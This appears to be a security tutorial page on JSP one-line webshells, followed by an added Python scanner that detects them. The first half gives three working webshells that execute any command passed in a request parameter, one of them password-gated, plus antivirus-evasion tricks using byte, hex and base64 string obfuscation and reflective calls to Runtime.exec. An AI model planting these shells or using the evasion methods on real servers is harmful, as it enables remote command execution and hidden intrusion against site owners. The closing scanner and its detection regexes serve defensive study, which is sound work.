1. One-line webshell without output echo
http://localhost/index.jsp?cmd=whoami
The execution result is not echoed back; only the Process object's address is printed on the server side, so this form is commonly used to spawn a reverse shell.
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>一句話木馬</title>
</head>
<body>
<%
    Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
    System.out.println(process);
%>
</body>
</html>
2. One-line webshell with output echo
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>一句話木馬</title>
</head>
<body>
<%
    Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
    InputStream inputStream = process.getInputStream();
    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
    String line;
    while ((line = bufferedReader.readLine()) != null) {
        response.getWriter().print(line);
    }
%>
</body>
</html>
3. Password-protected one-line webshell with output echo
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>一句話木馬</title>
</head>
<body>
<%
    if ("password".equals(request.getParameter("p"))) {
        Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
        InputStream inputStream = process.getInputStream();
        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
        String line;
        while ((line = bufferedReader.readLine()) != null) {
            response.getWriter().print(line);
        }
    }
%>
</body>
</html>
4. AV evasion / detection bypass
(1) String obfuscation methods in JSP
package com.eleven.test;

import sun.misc.BASE64Decoder;
import javax.xml.bind.DatatypeConverter;
import java.io.IOException;

public class JspEncode {
    public static void main(String[] args) throws IOException {
        // All three forms below decode to the same string, "yzddMr6"
        String a = new String(new byte[] {121, 122, 100, 100, 77, 114, 54});
        System.out.println("ASCII: " + a);
        String b = new String(DatatypeConverter.parseHexBinary("797a64644d7236"));
        System.out.println("HEX: " + b);
        String c = new String(new BASE64Decoder().decodeBuffer("eXpkZE1yNg=="));
        System.out.println("BASE64: " + c);
    }
}
(2) Bypass via class reflection
package com.eleven.test;

import java.lang.reflect.Method;
import java.util.Scanner;

public class Test {
    public static void main(String[] args) throws Exception {
        String op = "";
        Class rt = Class.forName("java.lang.Runtime");              // load the Runtime class
        Method gr = rt.getMethod("getRuntime");                     // get the getRuntime method
        Method ex = rt.getMethod("exec", String.class);             // get the exec method
        Process e = (Process) ex.invoke(gr.invoke(null), "cmd /c whoami"); // call it through invoke
        // The code below collects the command output
        Scanner sc = new Scanner(e.getInputStream()).useDelimiter("\\A");
        op = sc.hasNext() ? sc.next() : op;
        sc.close();
        System.out.print(op);
    }
}
The next step is to put this into a JSP.
Using base64 encoding
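The defender-side counterpart to the three shells in sections 1 to 3 and to the obfuscation and reflection tricks in section 4 is a static scan of JSP/Java source. The Python scanner below is an added example, not code from the original page: it flags Runtime.getRuntime().exec() whose argument comes from request.getParameter(), flags the reflection chain while the class and method names are still in clear text, and decodes byte-array, hex and base64 literals so that a method name hidden the way JspEncode shows is still recovered. The regexes, finding names and sample inputs are all constructed for this demo; the samples mirror the page's snippets.

```python
"""Static scan of JSP/Java source for the webshell patterns discussed above.

Added detection-side example (not code from the original page). It looks for
(1) Runtime.getRuntime().exec() fed by request.getParameter(),
(2) the reflection chain Class.forName("java.lang.Runtime") / getMethod("exec"),
(3) byte-array, hex and base64 string literals, which it decodes so that a
    sink name hidden by the obfuscation trick above still shows up.
All sample inputs below are constructed for the demo.
"""
import base64
import re

# (1) direct sink and the request-controlled source
SINK_RE = re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(")
TAINT_RE = re.compile(r"request\s*\.\s*getParameter\s*\(")
# (2) reflection chain with the class / method names still in clear text
REFLECT_CLASS_RE = re.compile(r'Class\s*\.\s*forName\s*\(\s*"java\.lang\.Runtime"\s*\)')
REFLECT_METHOD_RE = re.compile(r'getMethod\s*\(\s*"(getRuntime|exec)"')
# (3) the three literal encodings shown in JspEncode
BYTE_ARRAY_RE = re.compile(r"new\s+byte\s*\[\s*\]\s*\{([^}]*)\}")
HEX_RE = re.compile(r'parseHexBinary\s*\(\s*"([0-9a-fA-F]+)"\s*\)')
B64_RE = re.compile(r'decodeBuffer\s*\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
# names that are suspicious once they turn up inside a decoded literal
# (plain substring match: a heuristic, so expect some noise on e.g. "execute")
SINK_NAMES = ("java.lang.Runtime", "getRuntime", "exec", "ProcessBuilder")


def _call_argument(src, start):
    """Text from src[start] up to the ')' matching the '(' just before start."""
    depth, i = 1, start
    while i < len(src) and depth:
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
        i += 1
    return src[start:i - 1]


def decode_literals(src):
    """Return (encoding, decoded_text) for every encoded literal found in src."""
    found = []
    for m in BYTE_ARRAY_RE.finditer(src):
        try:
            vals = [int(v) for v in m.group(1).split(",") if v.strip()]
            # Java bytes are signed; mask so -1 becomes 0xFF like the JVM would
            found.append(("bytes", bytes(v & 0xFF for v in vals).decode("latin-1")))
        except ValueError:
            pass  # not a numeric initializer
    for m in HEX_RE.finditer(src):
        try:
            found.append(("hex", bytes.fromhex(m.group(1)).decode("latin-1")))
        except ValueError:
            pass  # odd-length hex string
    for m in B64_RE.finditer(src):
        try:
            found.append(("base64", base64.b64decode(m.group(1), validate=True).decode("latin-1")))
        except ValueError:
            pass  # binascii.Error is a ValueError subclass
    return found


def scan(src):
    """Return a list of (finding, detail) tuples; an empty list means nothing matched."""
    findings = []
    for m in SINK_RE.finditer(src):
        findings.append(("runtime-exec", ""))
        arg = _call_argument(src, m.end())
        if TAINT_RE.search(arg):
            findings.append(("request-controlled-exec", arg))
    if REFLECT_CLASS_RE.search(src):
        findings.append(("reflective-runtime-class", ""))
    for m in REFLECT_METHOD_RE.finditer(src):
        findings.append(("reflective-method", m.group(1)))
    for encoding, text in decode_literals(src):
        findings.append(("encoded-literal", f"{encoding}:{text}"))
        if any(name in text for name in SINK_NAMES):
            findings.append(("encoded-sink-name", text))
    return findings


# Constructed samples mirroring the page's snippets
SAMPLE_DIRECT = '<% Process process = Runtime.getRuntime().exec(request.getParameter("cmd")); %>'
SAMPLE_REFLECT = ('Class rt = Class.forName("java.lang.Runtime"); '
                  'Method ex = rt.getMethod("exec", String.class);')
SAMPLE_ENCODED = ('String a = new String(new byte[] {121,122,100,100,77,114,54}); '
                  'String b = new String(DatatypeConverter.parseHexBinary("797a64644d7236")); '
                  'String c = new String(new BASE64Decoder().decodeBuffer("eXpkZE1yNg=="));')
# Same reflection idea, but the method name arrives base64-encoded, so no
# clear-text "getRuntime" is left for a plain keyword search to find
SAMPLE_HIDDEN = ('String m = new String(new BASE64Decoder().decodeBuffer("Z2V0UnVudGltZQ==")); '
                 'Method gr = rt.getMethod(m);')
SAMPLE_BENIGN = '<% out.print(request.getParameter("name")); %>'

if __name__ == "__main__":
    for name, src in [("direct", SAMPLE_DIRECT), ("reflect", SAMPLE_REFLECT),
                      ("encoded", SAMPLE_ENCODED), ("hidden", SAMPLE_HIDDEN),
                      ("benign", SAMPLE_BENIGN)]:
        print(name, scan(src))
```

The keyword regexes alone miss SAMPLE_HIDDEN, which is exactly the point of the encoding trick above; the literal decoder is what brings "getRuntime" back into view, so a scanner should always normalise literals before matching on names.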